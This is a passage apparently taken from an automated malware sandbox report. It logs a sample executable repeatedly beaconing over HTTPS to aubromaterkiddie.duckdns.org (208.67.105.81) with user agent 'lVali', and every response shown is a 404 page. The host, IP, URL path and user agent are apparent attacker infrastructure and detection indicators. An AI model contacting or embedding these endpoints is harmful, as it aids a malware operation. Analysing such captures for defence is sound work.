                2022-08-05 10:10:58 UTC12INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 05 Aug 2022 10:10:58 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                2022-08-05 10:10:58 UTC12INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                3192.168.2.649744208.67.105.81443C:\Users\user\Desktop\vOj00hEkoQ.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 10:10:30 UTC1OUTGET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1
                User-Agent: lVali
                Host: aubromaterkiddie.duckdns.org
                2022-08-05 10:10:30 UTC1INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 05 Aug 2022 10:10:30 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                2022-08-05 10:10:30 UTC1INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                30192.168.2.649795208.67.105.81443C:\Users\user\Desktop\vOj00hEkoQ.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 10:10:59 UTC12OUTGET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1
                User-Agent: lVali
                Host: aubromaterkiddie.duckdns.org
                2022-08-05 10:10:59 UTC12INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 05 Aug 2022 10:10:59 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                2022-08-05 10:10:59 UTC12INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                31192.168.2.649796208.67.105.81443C:\Users\user\Desktop\vOj00hEkoQ.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 10:10:59 UTC13OUTGET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1
                User-Agent: lVali
                Host: aubromaterkiddie.duckdns.org
                2022-08-05 10:10:59 UTC13INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 05 Aug 2022 10:10:59 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                2022-08-05 10:10:59 UTC13INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                32192.168.2.649797208.67.105.81443C:\Users\user\Desktop\vOj00hEkoQ.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 10:11:00 UTC13OUTGET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1
                User-Agent: lVali
                Host: aubromaterkiddie.duckdns.org
                2022-08-05 10:11:00 UTC13INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 05 Aug 2022 10:11:00 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                2022-08-05 10:11:00 UTC13INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                33192.168.2.649798208.67.105.81443C:\Users\user\Desktop\vOj00hEkoQ.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 10:11:00 UTC13OUTGET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1
                User-Agent: lVali
                Host: aubromaterkiddie.duckdns.org
                2022-08-05 10:11:00 UTC14INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 05 Aug 2022 10:11:00 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                2022-08-05 10:11:00 UTC14INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                34192.168.2.649799208.67.105.81443C:\Users\user\Desktop\vOj00hEkoQ.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 10:11:01 UTC14OUTGET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1
                User-Agent: lVali
                Host: aubromaterkiddie.duckdns.org
                2022-08-05 10:11:01 UTC14INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 05 Aug 2022 10:11:01 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                2022-08-05 10:11:01 UTC14INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                35192.168.2.649800208.67.105.81443C:\Users\user\Desktop\vOj00hEkoQ.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 10:11:01 UTC14OUTGET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1
                User-Agent: lVali
                Host: aubromaterkiddie.duckdns.org
                2022-08-05 10:11:01 UTC14INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 05 Aug 2022 10:11:01 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                2022-08-05 10:11:01 UTC15INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                36192.168.2.649801208.67.105.81443C:\Users\user\Desktop\vOj00hEkoQ.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 10:11:04 UTC15OUTGET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1
                User-Agent: lVali
                Host: aubromaterkiddie.duckdns.org
                2022-08-05 10:11:04 UTC15INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 05 Aug 2022 10:11:04 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                2022-08-05 10:11:04 UTC15INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                37192.168.2.649803208.67.105.81443C:\Users\user\Desktop\vOj00hEkoQ.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 10:11:05 UTC15OUTGET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1
                User-Agent: lVali
                Host: aubromaterkiddie.duckdns.org
                2022-08-05 10:11:05 UTC15INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 05 Aug 2022 10:11:05 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                2022-08-05 10:11:05 UTC15INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                38192.168.2.649806208.67.105.81443C:\Users\user\Desktop\vOj00hEkoQ.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 10:11:05 UTC16OUTGET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1
                User-Agent: lVali
                Host: aubromaterkiddie.duckdns.org
                2022-08-05 10:11:05 UTC16INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 05 Aug 2022 10:11:05 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                2022-08-05 10:11:05 UTC16INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                39192.168.2.649810208.67.105.81443C:\Users\user\Desktop\vOj00hEkoQ.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 10:11:06 UTC16OUTGET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1
                User-Agent: lVali
                Host: aubromaterkiddie.duckdns.org
                2022-08-05 10:11:06 UTC16INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 05 Aug 2022 10:11:06 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                2022-08-05 10:11:06 UTC16INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                4192.168.2.649748208.67.105.81443C:\Users\user\Desktop\vOj00hEkoQ.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 10:10:30 UTC1OUTGET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1
                User-Agent: lVali
                Host: aubromaterkiddie.duckdns.org
                2022-08-05 10:10:30 UTC1INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 05 Aug 2022 10:10:30 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                2022-08-05 10:10:30 UTC1INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                40192.168.2.649814208.67.105.81443C:\Users\user\Desktop\vOj00hEkoQ.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 10:11:06 UTC16OUTGET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1
                User-Agent: lVali
                Host: aubromaterkiddie.duckdns.org
                2022-08-05 10:11:06 UTC17INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 05 Aug 2022 10:11:06 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                2022-08-05 10:11:06 UTC17INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                41192.168.2.649816208.67.105.81443C:\Users\user\Desktop\vOj00hEkoQ.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 10:11:07 UTC17OUTGET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1
                User-Agent: lVali
                Host: aubromaterkiddie.duckdns.org
                2022-08-05 10:11:07 UTC17INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 05 Aug 2022 10:11:07 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                2022-08-05 10:11:07 UTC17INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                42192.168.2.649818208.67.105.81443C:\Users\user\Desktop\vOj00hEkoQ.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 10:11:08 UTC17OUTGET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1
                User-Agent: lVali
                Host: aubromaterkiddie.duckdns.org
                2022-08-05 10:11:08 UTC17INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 05 Aug 2022 10:11:08 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                2022-08-05 10:11:08 UTC18INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                43192.168.2.649819208.67.105.81443C:\Users\user\Desktop\vOj00hEkoQ.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 10:11:08 UTC18OUTGET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1
                User-Agent: lVali
                Host: aubromaterkiddie.duckdns.org
                2022-08-05 10:11:08 UTC18INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 05 Aug 2022 10:11:08 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                2022-08-05 10:11:08 UTC18INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                44192.168.2.649820208.67.105.81443C:\Users\user\Desktop\vOj00hEkoQ.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 10:11:09 UTC18OUTGET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1
                User-Agent: lVali
                Host: aubromaterkiddie.duckdns.org
                2022-08-05 10:11:09 UTC18INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 05 Aug 2022 10:11:09 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                2022-08-05 10:11:09 UTC18INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                45192.168.2.649823208.67.105.81443C:\Users\user\Desktop\vOj00hEkoQ.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 10:11:11 UTC19OUTGET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1
                User-Agent: lVali
                Host: aubromaterkiddie.duckdns.org
                2022-08-05 10:11:11 UTC19INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 05 Aug 2022 10:11:11 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                2022-08-05 10:11:11 UTC19INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                46192.168.2.649825208.67.105.81443C:\Users\user\Desktop\vOj00hEkoQ.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 10:11:11 UTC19OUTGET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1
                User-Agent: lVali
                Host: aubromaterkiddie.duckdns.org
                2022-08-05 10:11:11 UTC19INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 05 Aug 2022 10:11:11 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                2022-08-05 10:11:11 UTC19INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                47192.168.2.649827208.67.105.81443C:\Users\user\Desktop\vOj00hEkoQ.exe
                TimestampkBytes transferredDirectionData
